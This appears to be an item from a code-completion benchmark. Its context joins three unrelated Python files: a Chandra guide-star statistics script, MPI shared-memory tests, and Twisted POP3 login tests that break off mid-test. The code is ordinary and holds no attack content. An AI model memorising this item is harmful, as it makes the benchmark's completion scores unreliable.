gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import division
import os
import time
import sys
import argparse
import numpy as np
import tables
from astropy.table import Table
import logging
import warnings
from Chandra.Time import DateTime
import agasc
from kadi import events
from Ska.engarchive import fetch, fetch_sci
import mica.archive.obspar
from mica.starcheck.starcheck import get_starcheck_catalog_at_date
import Ska.astro
from Quaternion import Quat
from chandra_aca import dark_model
from chandra_aca.transform import radec_to_eci
# Ignore known numexpr.necompiler and table.conditions warning
warnings.filterwarnings(
'ignore',
message="using `oa_ndim == 0` when `op_axes` is NULL is deprecated.*",
category=DeprecationWarning)
logger = logging.getLogger('star_stats')
logger.setLevel(logging.INFO)
if not len(logger.handlers):
logger.addHandler(logging.StreamHandler())
STAT_VERSION = 0.6
GUIDE_COLS = {
'obs': [
('obsid', 'int'),
('obi', 'int'),
('kalman_tstart', 'float'),
('npnt_tstop', 'float'),
('kalman_datestart', 'S21'),
('npnt_datestop', 'S21'),
('revision', 'S15')],
'cat': [
('slot', 'int'),
('idx', 'int'),
('type', 'S5'),
('yang', 'float'),
('zang', 'float'),
('sz', 'S4'),
('mag', 'float')],
'stat': [
('n_samples', 'int'),
('n_track', 'int'),
('f_track', 'float'),
('f_racq', 'float'),
('f_srch', 'float'),
('f_none', 'float'),
('n_kalman', 'int'),
('no_track', 'float'),
('f_within_0.3', 'float'),
('f_within_1', 'float'),
('f_within_3', 'float'),
('f_within_5', 'float'),
('f_outside_5', 'float'),
('f_obc_bad', 'float'),
('f_common_col', 'float'),
('f_quad_bound', 'float'),
('f_sat_pix', 'float'),
('f_def_pix', 'float'),
('f_ion_rad', 'float'),
('f_mult_star', 'float'),
('aoacmag_min', 'float'),
('aoacmag_mean', 'float'),
('aoacmag_max', 'float'),
('aoacmag_5th', 'float'),
('aoacmag_16th', 'float'),
('aoacmag_50th', 'float'),
('aoacmag_84th', 'float'),
('aoacmag_95th', 'float'),
('aoacmag_std', 'float'),
('aoacyan_mean', 'float'),
('aoaczan_mean', 'float'),
('dy_min', 'float'),
('dy_mean', 'float'),
('dy_std', 'float'),
('dy_max', 'float'),
('dz_min', 'float'),
('dz_mean', 'float'),
('dz_std', 'float'),
('dz_max', 'float'),
('dr_min', 'float'),
('dr_mean', 'float'),
('dr_std', 'float'),
('dr_5th', 'float'),
('dr_95th', 'float'),
('dr_max', 'float'),
('n_track_interv', 'int'),
('n_long_track_interv', 'int'),
('n_long_no_track_interv', 'int'),
('n_racq_interv', 'int'),
('n_srch_interv', 'int'),
],
'agasc': [
('agasc_id', 'int'),
('color', 'float'),
('ra', 'float'),
('dec', 'float'),
('epoch', 'float'),
('pm_ra', 'int'),
('pm_dec', 'int'),
('var', 'int'),
('pos_err', 'int'),
('mag_aca', 'float'),
('mag_aca_err', 'int'),
('mag_band', 'int'),
('pos_catid', 'int'),
('aspq1', 'int'),
('aspq2', 'int'),
('aspq3', 'int'),
('acqq1', 'int'),
('acqq2', 'int'),
('acqq4', 'int')],
'temp': [
('n100_warm_frac', 'float'),
('tccd_mean', 'float'),
('tccd_max', 'float')],
'bad': [
('known_bad', 'bool'),
('bad_comment', 'S15')],
}
def get_options():
parser = argparse.ArgumentParser(
description="Update guide stats table")
parser.add_argument("--check-missing",
action='store_true',
help="check for missing observations in table and reprocess")
parser.add_argument("--obsid",
help="specific obsid to process. Not required in regular update mode")
parser.add_argument("--start",
help="start time for processing")
parser.add_argument("--stop",
help="stop time for processing")
parser.add_argument("--datafile",
default="gs.h5")
opt = parser.parse_args()
return opt
def _deltas_vs_obc_quat(vals, times, catalog):
# Misalign is the identity matrix because this is the OBC quaternion
aca_misalign = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
q_att = Quat(q=np.array([vals['AOATTQT1'],
vals['AOATTQT2'],
vals['AOATTQT3'],
vals['AOATTQT4']]).transpose())
Ts = q_att.transform
acqs = catalog
R2A = 206264.81
dy = {}
dz = {}
yag = {}
zag = {}
star_info = {}
for slot in range(0, 8):
if slot not in acqs['slot']:
continue
agasc_id = acqs[acqs['slot'] == slot][0]['id']
if agasc_id is None:
logger.info("No agasc id for slot {}, skipping".format(slot))
continue
try:
# This is not perfect for star catalogs for agasc 1.4 and 1.5
star = agasc.get_star(agasc_id, date=times[0], use_supplement=False)
except:
logger.info("agasc error on slot {}:{}".format(
slot, sys.exc_info()[0]))
continue
ra = star['RA_PMCORR']
dec = star['DEC_PMCORR']
star_pos_eci = radec_to_eci(ra, dec)
d_aca = np.dot(np.dot(aca_misalign, Ts.transpose(0, 2, 1)),
star_pos_eci).transpose()
yag[slot] = np.arctan2(d_aca[:, 1], d_aca[:, 0]) * R2A
zag[slot] = np.arctan2(d_aca[:, 2], d_aca[:, 0]) * R2A
dy[slot] = vals['AOACYAN{}'.format(slot)] - yag[slot]
dz[slot] = vals['AOACZAN{}'.format(slot)] - zag[slot]
star_info[slot] = star
return dy, dz, star_info, yag, zag
def get_data(start, stop, obsid=None, starcheck=None):
# Get telemetry
msids = ['AOACASEQ', 'AOACQSUC', 'AOFREACQ', 'AOFWAIT', 'AOREPEAT',
'AOACSTAT', 'AOACHIBK', 'AOFSTAR', 'AOFATTMD', 'AOACPRGS',
'AOATUPST', 'AONSTARS', 'AOPCADMD', 'AORFSTR1', 'AORFSTR2',
'AOATTQT1', 'AOATTQT2', 'AOATTQT3', 'AOATTQT4']
per_slot = ['AOACQID', 'AOACFCT', 'AOIMAGE',
'AOACMAG', 'AOACYAN', 'AOACZAN',
'AOACICC', 'AOACIDP', 'AOACIIR', 'AOACIMS',
'AOACIQB', 'AOACISP']
slot_msids = [field + '%s' % slot
for field in per_slot
for slot in range(0, 8)]
start_time = DateTime(start).secs
stop_time = DateTime(stop)
dat = fetch.MSIDset(msids + slot_msids,
start_time,
stop_time)
if len(dat['AOACASEQ']) == 0:
raise ValueError("No telemetry for obsid {}".format(obsid))
# Interpolate the MSIDset onto the original time grid (which shouldn't do much)
# but also remove all rows where any one msid has a bad value
dat.interpolate(times=dat['AOACASEQ'].times, bad_union=True)
eng_data = Table([col.vals for col in dat.values()], names=dat.keys())
eng_data['times'] = dat.times
times = eng_data['times']
if starcheck is None:
return eng_data, times, None
catalog = Table(starcheck['cat'])
catalog.sort('idx')
# Filter the catalog to be just guide stars
catalog = catalog[(catalog['type'] == 'GUI') | (catalog['type'] == 'BOT')]
# Get the position deltas relative to onboard solution
dy, dz, star_info, yag, zag = _deltas_vs_obc_quat(eng_data, times, catalog)
# And add the deltas to the table
for slot in range(0, 8):
if slot not in dy:
continue
eng_data['dy{}'.format(slot)] = dy[slot].data
eng_data['dz{}'.format(slot)] = dz[slot].data
eng_data['cat_yag{}'.format(slot)] = yag[slot]
eng_data['cat_zag{}'.format(slot)] = zag[slot]
cat_entry = catalog[catalog['slot'] == slot][0]
dmag = eng_data['AOACMAG{}'.format(slot)] - cat_entry['mag']
eng_data['dmag'] = dmag.data
eng_data['time'] = times
return eng_data, star_info
def consecutive(data, stepsize=1):
return np.split(data, np.where(np.diff(data) != stepsize)[0] + 1)
def calc_gui_stats(data, star_info):
logger.info("calculating statistics")
gui_stats = {}
for slot in range(0, 8):
if 'dy{}'.format(slot) not in data.colnames:
continue
stats = {}
aoacfct = data['AOACFCT{}'.format(slot)]
stats['n_samples'] = len(aoacfct)
if len(aoacfct) == 0:
gui_stats[slot] = stats
continue
stats['n_track'] = np.count_nonzero(aoacfct == 'TRAK')
stats['f_track'] = stats['n_track'] / stats['n_samples']
stats['f_racq'] = np.count_nonzero(aoacfct == 'RACQ') / stats['n_samples']
stats['f_srch'] = np.count_nonzero(aoacfct == 'SRCH') / stats['n_samples']
stats['f_none'] = np.count_nonzero(aoacfct == 'NONE') / stats['n_samples']
if np.all(aoacfct != 'TRAK'):
gui_stats[slot] = stats
continue
trak = data[aoacfct == 'TRAK']
ok_flags = ((trak['AOACIIR{}'.format(slot)] == 'OK ')
& (trak['AOACISP{}'.format(slot)] == 'OK '))
stats['n_kalman'] = np.count_nonzero(ok_flags)
stats['no_track'] = (stats['n_samples'] - stats['n_track']) / stats['n_samples']
stats['f_obc_bad'] = (stats['n_track'] - stats['n_kalman']) / stats['n_track']
stats['f_common_col'] = np.count_nonzero(trak['AOACICC{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_sat_pix'] = np.count_nonzero(trak['AOACISP{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_def_pix'] = np.count_nonzero(trak['AOACIDP{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_ion_rad'] = np.count_nonzero(trak['AOACIIR{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_mult_star'] = np.count_nonzero(trak['AOACIMS{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_quad_bound'] = np.count_nonzero(trak['AOACIQB{}'.format(slot)] == 'ERR') / stats['n_track']
track_interv = consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'TRAK'))
stats['n_track_interv'] = len(track_interv)
track_interv_durations = np.array([len(interv) for interv in track_interv])
stats['n_long_track_interv'] = np.count_nonzero(track_interv_durations > 60)
not_track_interv = consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] != 'TRAK'))
not_track_interv_durations = np.array([len(interv) for interv in not_track_interv])
stats['n_long_no_track_interv'] = np.count_nonzero(not_track_interv_durations > 60)
stats['n_racq_interv'] = len(consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'RACQ')))
stats['n_srch_interv'] = len(consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'SRCH')))
stats['n_track_interv'] = len(consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'TRAK')))
# reduce this to just the samples that don't have IR or SP set and are in Kalman on guide stars
# and are after the first 60 seconds
kal = trak[ok_flags & (trak['AOACASEQ'] == 'KALM') & (trak['AOPCADMD'] == 'NPNT')
& (trak['AOFSTAR'] == 'GUID') & (trak['time'] > (data['time'][0] + 60))]
dy = kal['dy{}'.format(slot)]
dz = kal['dz{}'.format(slot)]
# cheating here and ignoring spherical trig
dr = (dy ** 2 + dz ** 2) ** .5
stats['star_tracked'] = np.any(dr < 5.0)
stats['spoiler_tracked'] = np.any(dr > 5.0)
deltas = {'dy': dy, 'dz': dz, 'dr': dr}
stats['dr_5th'] = np.percentile(deltas['dr'], 5)
stats['dr_95th'] = np.percentile(deltas['dr'], 95)
for ax in deltas:
stats['{}_mean'.format(ax)] = np.mean(deltas[ax])
stats['{}_std'.format(ax)] = np.std(deltas[ax])
stats['{}_max'.format(ax)] = np.max(deltas[ax])
stats['{}_min'.format(ax)] = np.min(deltas[ax])
mag = kal['AOACMAG{}'.format(slot)]
stats['aoacmag_min'] = np.min(mag)
stats['aoacmag_mean'] = np.mean(mag)
stats['aoacmag_max'] = np.max(mag)
stats['aoacmag_std'] = np.std(mag)
for perc in [5, 16, 50, 84, 95]:
stats[f'aoacmag_{perc}th'] = np.percentile(mag, perc)
stats['aoacyan_mean'] = np.mean(kal['AOACYAN{}'.format(slot)])
stats['aoaczan_mean'] = np.mean(kal['AOACZAN{}'.format(slot)])
for dist in ['0.3', '1', '3', '5']:
stats['f_within_{}'.format(dist)] = np.count_nonzero(dr < float(dist)) / len(kal)
stats['f_outside_5'] = np.count_nonzero(dr > 5) / len(kal)
gui_stats[slot] = stats
return gui_stats
def _get_obsids_to_update(check_missing=False, table_file=None, start=None, stop=None):
if check_missing:
last_tstart = start if start is not None else '2007:271:12:00:00'
kadi_obsids = events.obsids.filter(start=last_tstart)
try:
h5 = tables.open_file(table_file, 'r')
tbl = h5.root.data[:]
h5.close()
except:
raise ValueError
# get all obsids that aren't already in tbl
obsids = [o.obsid for o in kadi_obsids if o.obsid not in tbl['obsid']]
else:
try:
h5 = tables.open_file(table_file, 'r')
tbl = h5.get_node('/', 'data')
last_tstart = tbl.cols.kalman_tstart[tbl.colindexes['kalman_tstart'][-1]]
h5.close()
except:
last_tstart = start if start is not None else '2002:012:12:00:00'
kadi_obsids = events.obsids.filter(start=last_tstart, stop=stop)
# Skip the first obsid (as we already have it in the table)
obsids = [o.obsid for o in kadi_obsids][1:]
return obsids
def calc_stats(obsid):
obspar = mica.archive.obspar.get_obspar(obsid)
if not obspar:
raise ValueError("No obspar for {}".format(obsid))
manvr = None
dwell = None
try:
manvrs = events.manvrs.filter(obsid=obsid, n_dwell__gt=0)
dwells = events.dwells.filter(obsid=obsid)
if dwells.count() == 1 and manvrs.count() == 0:
# If there is more than one dwell for the manvr but they have
# different obsids (unusual) so don't throw an overlapping interval kadi error
# just get the maneuver to the attitude with this dwell
dwell = dwells[0]
manvr = dwell.manvr
elif dwells.count() == 0:
# If there's just nothing, that doesn't need an error here
# and gets caught outside the try/except
pass
else:
# Else just take the first matches from each
manvr = manvrs[0]
dwell = dwells[0]
except ValueError:
multi_manvr = events.manvrs.filter(start=obspar['tstart'] - 100000,
stop=obspar['tstart'] + 100000)
multi = multi_manvr.select_overlapping(events.obsids(obsid=obsid))
deltas = [np.abs(m.tstart - obspar['tstart']) for m in multi]
manvr = multi[np.argmin(deltas)]
dwell = manvr.dwell_set.first()
if not manvr or not dwell:
raise ValueError("No manvr or dwell for {}".format(obsid))
if not manvr.get_next():
raise ValueError("No *next* manvr so can't calculate dwell")
if not manvr.guide_start:
raise ValueError("No guide transition for {}".format(obsid))
if not manvr.kalman_start:
raise ValueError("No Kalman transition for {}".format(obsid))
logger.info("Found obsid manvr at {}".format(manvr.start))
logger.info("Found dwell at {}".format(dwell.start))
starcheck = get_starcheck_catalog_at_date(manvr.guide_start)
if starcheck is None or 'cat' not in starcheck or not len(starcheck['cat']):
raise ValueError('No starcheck catalog found for {}'.format(
manvr.get_obsid()))
starcat_time = DateTime(starcheck['cat']['mp_starcat_time'][0]).secs
starcat_dtime = starcat_time - DateTime(manvr.start).secs
# If it looks like the wrong starcheck by time, give up
if abs(starcat_dtime) > 300:
raise ValueError("Starcheck cat time delta is {}".format(starcat_dtime))
if abs(starcat_dtime) > 30:
logger.warning("Starcheck cat time delta of {} is > 30 sec".format(abs(starcat_dtime)))
# The NPNT dwell should end when the next maneuver starts, but explicitly confirm via pcadmd
pcadmd = fetch.Msid('AOPCADMD', manvr.kalman_start, manvr.get_next().tstart + 20)
next_nman_start = pcadmd.times[pcadmd.vals != 'NPNT'][0]
vals, star_info = get_data(start=manvr.kalman_start, stop=next_nman_start,
obsid=obsid, starcheck=starcheck)
gui_stats = calc_gui_stats(vals, star_info)
obsid_info = {'obsid': obsid,
'obi': obspar['obi_num'],
'kalman_datestart': manvr.kalman_start,
'kalman_tstart': DateTime(manvr.kalman_start).secs,
'npnt_tstop': DateTime(next_nman_start).secs,
'npnt_datestop': DateTime(next_nman_start).date,
'revision': STAT_VERSION}
catalog = Table(starcheck['cat'])
catalog.sort('idx')
guide_catalog = catalog[(catalog['type'] == 'GUI') | (catalog['type'] == 'BOT')]
aacccdpt = fetch_sci.MSID('AACCCDPT', manvr.kalman_start, manvr.get_next().start)
warm_threshold = 100.0
tccd_mean = np.mean(aacccdpt.vals)
tccd_max = np.max(aacccdpt.vals)
warm_frac = dark_model.get_warm_fracs(warm_threshold, manvr.start, tccd_mean)
temps = {'tccd_mean': tccd_mean, 'n100_warm_frac': warm_frac,
'tccd_max': tccd_max}
return obsid_info, gui_stats, star_info, guide_catalog, temps
def table_gui_stats(obsid_info, gui_stats, star_info, catalog, temp):
logger.info("arranging stats into tabular data")
cols = (GUIDE_COLS['obs'] + GUIDE_COLS['cat'] + GUIDE_COLS['stat']
+ GUIDE_COLS['agasc'] + GUIDE_COLS['temp'] + GUIDE_COLS['bad'])
# Initialize all values to zero
table = Table(np.zeros((1, 8), dtype=cols).flatten())
# Set all columns with mag info to 99.0 initial value instead of zero
for col in table.dtype.names:
if 'aoacmag' in col:
table[col] = 99.0
for col in np.dtype(GUIDE_COLS['obs']).names:
if col in obsid_info:
table[col][:] = obsid_info[col]
# Make a mask to identify 'missing' slots
missing_slots = np.zeros(8, dtype=bool)
for slot in range(0, 8):
row = table[slot]
if slot not in catalog['slot']:
missing_slots[slot] = True
continue
for col in np.dtype(GUIDE_COLS['cat']).names:
row[col] = catalog[catalog['slot'] == slot][0][col]
for col in np.dtype(GUIDE_COLS['stat']).names:
if col in gui_stats[slot]:
row[col] = gui_stats[slot][col]
if slot not in star_info:
continue
row['color'] = star_info[slot]['COLOR1']
row['ra'] = star_info[slot]['RA_PMCORR']
row['dec'] = star_info[slot]['DEC_PMCORR']
for col in np.dtype(GUIDE_COLS['agasc']).names:
if col in ['color', 'ra', 'dec']:
continue
row[col] = star_info[slot][col.upper()]
row['tccd_mean'] = temp['tccd_mean']
row['tccd_max'] = temp['tccd_max']
row['n100_warm_frac'] = temp['n100_warm_frac']
row['known_bad'] = False
row['bad_comment'] = ''
# Exclude any rows that are missing
table = table[~missing_slots]
return table
def _save_gui_stats(t, table_file=None):
if table_file is None:
return
if not os.path.exists(table_file):
cols = (GUIDE_COLS['obs'] + GUIDE_COLS['cat'] + GUIDE_COLS['stat']
+ GUIDE_COLS['agasc'] + GUIDE_COLS['temp'] + GUIDE_COLS['bad'])
desc, byteorder = tables.descr_from_dtype(np.dtype(cols))
filters = tables.Filters(complevel=5, complib='zlib')
h5 = tables.open_file(table_file, 'a')
tbl = h5.create_table('/', 'data', desc, filters=filters,
expectedrows=1e6)
tbl.cols.obsid.create_index()
tbl.cols.kalman_tstart.create_csindex()
tbl.cols.agasc_id.create_index()
h5.close()
del h5
h5 = tables.open_file(table_file, 'a')
tbl = h5.get_node('/', 'data')
have_obsid_coord = tbl.get_where_list(
'(obsid == {}) & (obi == {})'.format(
t[0]['obsid'], t[0]['obi']), sort=True)
if len(have_obsid_coord):
obsid_rec = tbl.read_coordinates(have_obsid_coord)
if len(obsid_rec) != len(t):
raise ValueError(
"Could not update {}; different number of slots".format(
t[0]['obsid']))
# preserve any 'known_bad' status
for row in obsid_rec:
slot = row['slot']
t['known_bad'][t['slot'] == slot] = row['known_bad']
t['bad_comment'][t['slot'] == slot] = row['bad_comment']
tbl.modify_coordinates(have_obsid_coord, t.as_array())
else:
tbl.append(t.as_array())
logger.info("saving stats to h5 table")
tbl.flush()
h5.flush()
h5.close()
def update(opt):
if opt.obsid:
obsids = [int(opt.obsid)]
else:
obsids = _get_obsids_to_update(table_file=opt.datafile, check_missing=opt.check_missing,
start=opt.start, stop=opt.stop)
for obsid in obsids:
logger.info("Processing obsid {}".format(obsid))
try:
obsid_info, gui_stats, star_info, guide_catalog, temp = calc_stats(obsid)
except Exception as e:
open(os.path.splitext(opt.datafile)[0] + '_skipped.dat', 'a').write(
"{}: {}\n".format(obsid, e))
logger.info("Skipping obsid {}: {}".format(obsid, e))
continue
if not len(gui_stats):
open(os.path.splitext(opt.datafile)[0] + '_skipped.dat', 'a').write(
"{}: No stats\n".format(obsid))
logger.info("Skipping obsid {}, no stats determined".format(obsid))
continue
t = table_gui_stats(obsid_info, gui_stats, star_info, guide_catalog, temp)
_save_gui_stats(t, opt.datafile)
def main():
opt = get_options()
update(opt)
if __name__ == '__main__':
main()
|
|
##
# Copyright (c) 2017-2020, all rights reserved. Use of this source code
# is governed by a BSD license that can be found in the top-level
# LICENSE file.
##
import os
import sys
import time
import traceback
import unittest
import numpy as np
import numpy.testing as nt
from .shmem import MPIShared
from .locking import MPILock
MPI = None
use_mpi = True
if "MPI_DISABLE" in os.environ:
use_mpi = False
if use_mpi and (MPI is None):
try:
import mpi4py.MPI as MPI
except ImportError:
raise ImportError("Cannot import mpi4py, will only test serial functionality.")
class ShmemTest(unittest.TestCase):
def setUp(self):
self.comm = None
if MPI is not None:
self.comm = MPI.COMM_WORLD
self.rank = 0
self.procs = 1
if self.comm is not None:
self.rank = self.comm.rank
self.procs = self.comm.size
def tearDown(self):
pass
def read_write(self, comm):
"""Run a sequence of various access tests."""
rank = 0
procs = 1
if comm is not None:
rank = comm.rank
procs = comm.size
# Dimensions of our shared memory array
datadims = (2, 5, 10)
# Dimensions of the incremental slab that we will
# copy during each set() call.
updatedims = (1, 1, 5)
# How many updates are there to cover the whole
# data array?
nupdate = 1
for d in range(len(datadims)):
nupdate *= datadims[d] // updatedims[d]
for datatype in [np.int32, np.int64, np.float32, np.float64]:
# For testing the "set()" method, every process is going to
# create a full-sized data buffer and fill it with its process rank.
local = np.ones(datadims, dtype=datatype)
local *= rank
# A context manager is the pythonic way to make sure that the
# object has no dangling reference counts after leaving the context,
# and will ensure that the shared memory is freed properly.
with MPIShared(local.shape, local.dtype, comm) as shm:
for p in range(procs):
# Every process takes turns writing to the buffer.
setdata = None
setoffset = (0, 0, 0)
# Write to the whole data volume, but in small blocks
for upd in range(nupdate):
if p == rank:
# My turn! Write my process rank to the buffer slab.
setdata = local[
setoffset[0] : setoffset[0] + updatedims[0],
setoffset[1] : setoffset[1] + updatedims[1],
setoffset[2] : setoffset[2] + updatedims[2],
]
try:
# All processes call set(), but only data on rank p matters.
shm.set(setdata, setoffset, fromrank=p)
except:
print(
"proc {} threw exception during set()".format(rank),
flush=True,
)
if comm is not None:
comm.Abort()
else:
sys.exit(1)
try:
# Same as set(), but using __setitem__ with an
# allreduce to find which process is setting.
# key as a tuple slices
if setdata is None:
shm[None] = setdata
else:
shm[
setoffset[0] : setoffset[0] + setdata.shape[0],
setoffset[1] : setoffset[1] + setdata.shape[1],
setoffset[2] : setoffset[2] + setdata.shape[2],
] = setdata
except:
print(
"proc {} threw exception during __setitem__".format(
rank
),
flush=True,
)
if comm is not None:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback
)
lines = ["Proc {}: {}".format(rank, x) for x in lines]
print("".join(lines), flush=True)
comm.Abort()
else:
raise
# Increment the write offset within the array
x = setoffset[0]
y = setoffset[1]
z = setoffset[2]
z += updatedims[2]
if z >= datadims[2]:
z = 0
y += updatedims[1]
if y >= datadims[1]:
y = 0
x += updatedims[0]
setoffset = (x, y, z)
# Every process is now going to read a copy from the shared memory
# and make sure that they see the data written by the current process.
check = np.zeros_like(local)
check[:, :, :] = shm[:, :, :]
truth = np.ones_like(local)
truth *= p
# This should be bitwise identical, even for floats
nt.assert_equal(check[:, :, :], truth[:, :, :])
# Try full array assignment with slices containing None start
# values
if p != rank:
shm[None] = None
else:
shm[:, :, :] = local
check[:, :, :] = shm[:, :, :]
nt.assert_equal(check[:, :, :], truth[:, :, :])
# Ensure that we can reference the memory buffer from numpy without
# a memory copy. The intention is that a slice of the shared memory
# buffer should appear as a C-contiguous ndarray whenever we slice
# along the last dimension.
for p in range(procs):
if p == rank:
slc = shm[1, 2]
print(
"proc {} slice has dims {}, dtype {}, C = {}".format(
p, slc.shape, slc.dtype.str, slc.flags["C_CONTIGUOUS"]
),
flush=True,
)
if comm is not None:
comm.barrier()
def test_world(self):
if self.comm is None:
print("Testing MPIShared without MPI...", flush=True)
elif self.comm.rank == 0:
print("Testing MPIShared with world communicator...", flush=True)
self.read_write(self.comm)
def test_split(self):
if self.comm is not None:
if self.comm.rank == 0:
print("Testing MPIShared with split grid communicator...", flush=True)
# Split the comm into a grid
n_y = int(np.sqrt(self.comm.size))
if n_y < 1:
n_y = 1
n_x = self.comm.size // n_y
y_rank = self.comm.rank // n_x
x_rank = self.comm.rank % n_x
x_comm = self.comm.Split(y_rank, x_rank)
y_comm = self.comm.Split(x_rank, y_rank)
self.read_write(x_comm)
self.read_write(y_comm)
def test_comm_self(self):
if self.comm is not None:
if self.comm.rank == 0:
print("Testing MPIShared with COMM_SELF...", flush=True)
# Every process does the operations on COMM_SELF
self.read_write(MPI.COMM_SELF)
def test_shape(self):
good_dims = [
(2, 5, 10),
np.array([10, 2], dtype=np.int32),
np.array([5, 2], dtype=np.int64),
np.array([10, 2], dtype=np.int),
]
bad_dims = [
(2, 5.5, 10),
np.array([10, 2], dtype=np.float32),
np.array([5, 2], dtype=np.float64),
np.array([10, 2.5], dtype=np.float32),
]
dt = np.float64
for dims in good_dims:
try:
shm = MPIShared(dims, dt, self.comm)
if self.rank == 0:
print("successful creation with shape {}".format(dims), flush=True)
del shm
except ValueError:
if self.rank == 0:
print(
"unsuccessful creation with shape {}".format(dims), flush=True
)
for dims in bad_dims:
try:
shm = MPIShared(dims, dt, self.comm)
if self.rank == 0:
print("unsuccessful rejection of shape {}".format(dims), flush=True)
del shm
except ValueError:
if self.rank == 0:
print("successful rejection of shape {}".format(dims), flush=True)
class LockTest(unittest.TestCase):
def setUp(self):
self.comm = None
if MPI is not None:
self.comm = MPI.COMM_WORLD
self.rank = 0
self.procs = 1
if self.comm is not None:
self.rank = self.comm.rank
self.procs = self.comm.size
self.sleepsec = 0.2
def tearDown(self):
pass
def test_lock(self):
with MPILock(self.comm, root=0, debug=True) as lock:
for lk in range(5):
msg = "test_lock: process {} got lock {}".format(self.rank, lk)
lock.lock()
print(msg, flush=True)
# time.sleep(self.sleepsec)
lock.unlock()
if self.comm is not None:
self.comm.barrier()
def run():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(LockTest))
suite.addTest(unittest.makeSuite(ShmemTest))
runner = unittest.TextTestRunner()
runner.run(suite)
return
|
|
# -*- test-case-name: twisted.mail.test.test_pop3client -*-
# Copyright (c) 2001-2004 Divmod Inc.
# See LICENSE for details.
import sys
import inspect
from zope.interface import directlyProvides
from twisted.mail.pop3 import AdvancedPOP3Client as POP3Client
from twisted.mail.pop3 import InsecureAuthenticationDisallowed
from twisted.mail.pop3 import ServerErrorResponse
from twisted.protocols import loopback
from twisted.internet import reactor, defer, error, protocol, interfaces
from twisted.python import log
from twisted.trial import unittest
from twisted.test.proto_helpers import StringTransport
from twisted.protocols import basic
from twisted.mail.test import pop3testserver
try:
from twisted.test.ssl_helpers import ClientTLSContext, ServerTLSContext
except ImportError:
ClientTLSContext = ServerTLSContext = None
class StringTransportWithConnectionLosing(StringTransport):
def loseConnection(self):
self.protocol.connectionLost(error.ConnectionDone())
capCache = {"TOP": None, "LOGIN-DELAY": "180", "UIDL": None, \
"STLS": None, "USER": None, "SASL": "LOGIN"}
def setUp(greet=True):
p = POP3Client()
# Skip the CAPA login will issue if it doesn't already have a
# capability cache
p._capCache = capCache
t = StringTransportWithConnectionLosing()
t.protocol = p
p.makeConnection(t)
if greet:
p.dataReceived('+OK Hello!\r\n')
return p, t
def strip(f):
return lambda result, f=f: f()
class POP3ClientLoginTests(unittest.TestCase):
def testNegativeGreeting(self):
p, t = setUp(greet=False)
p.allowInsecureLogin = True
d = p.login("username", "password")
p.dataReceived('-ERR Offline for maintenance\r\n')
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Offline for maintenance"))
def testOkUser(self):
p, t = setUp()
d = p.user("username")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK send password\r\n")
return d.addCallback(self.assertEqual, "send password")
def testBadUser(self):
p, t = setUp()
d = p.user("username")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("-ERR account suspended\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "account suspended"))
def testOkPass(self):
p, t = setUp()
d = p.password("password")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("+OK you're in!\r\n")
return d.addCallback(self.assertEqual, "you're in!")
def testBadPass(self):
p, t = setUp()
d = p.password("password")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("-ERR go away\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "go away"))
def testOkLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK go ahead\r\n")
self.assertEqual(t.value(), "USER username\r\nPASS password\r\n")
p.dataReceived("+OK password accepted\r\n")
return d.addCallback(self.assertEqual, "password accepted")
def testBadPasswordLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK waiting on you\r\n")
self.assertEqual(t.value(), "USER username\r\nPASS password\r\n")
p.dataReceived("-ERR bogus login\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "bogus login"))
def testBadUsernameLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("-ERR bogus login\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "bogus login"))
def testServerGreeting(self):
p, t = setUp(greet=False)
p.dataReceived("+OK lalala this has no challenge\r\n")
self.assertEqual(p.serverChallenge, None)
def testServerGreetingWithChallenge(self):
p, t = setUp(greet=False)
p.dataReceived("+OK <here is the challenge>\r\n")
self.assertEqual(p.serverChallenge, "<here is the challenge>")
def testAPOP(self):
p, t = setUp(greet=False)
p.dataReceived("+OK <challenge string goes here>\r\n")
d = p.login("username", "password")
self.assertEqual(t.value(), "APOP username f34f1e464d0d7927607753129cabe39a\r\n")
p.dataReceived("+OK Welcome!\r\n")
return d.addCallback(self.assertEqual, "Welcome!")
def testInsecureLoginRaisesException(self):
p, t = setUp(greet=False)
p.dataReceived("+OK Howdy\r\n")
d = p.login("username", "password")
self.failIf(t.value())
return self.assertFailure(
d, InsecureAuthenticationDisallowed)
def testSSLTransportConsideredSecure(self):
"""
If a server doesn't offer APOP but the transport is secured using
SSL or TLS, a plaintext login should be allowed, not rejected with
an InsecureAuthenticationDisallowed exception.
"""
p, t = setUp(greet=False)
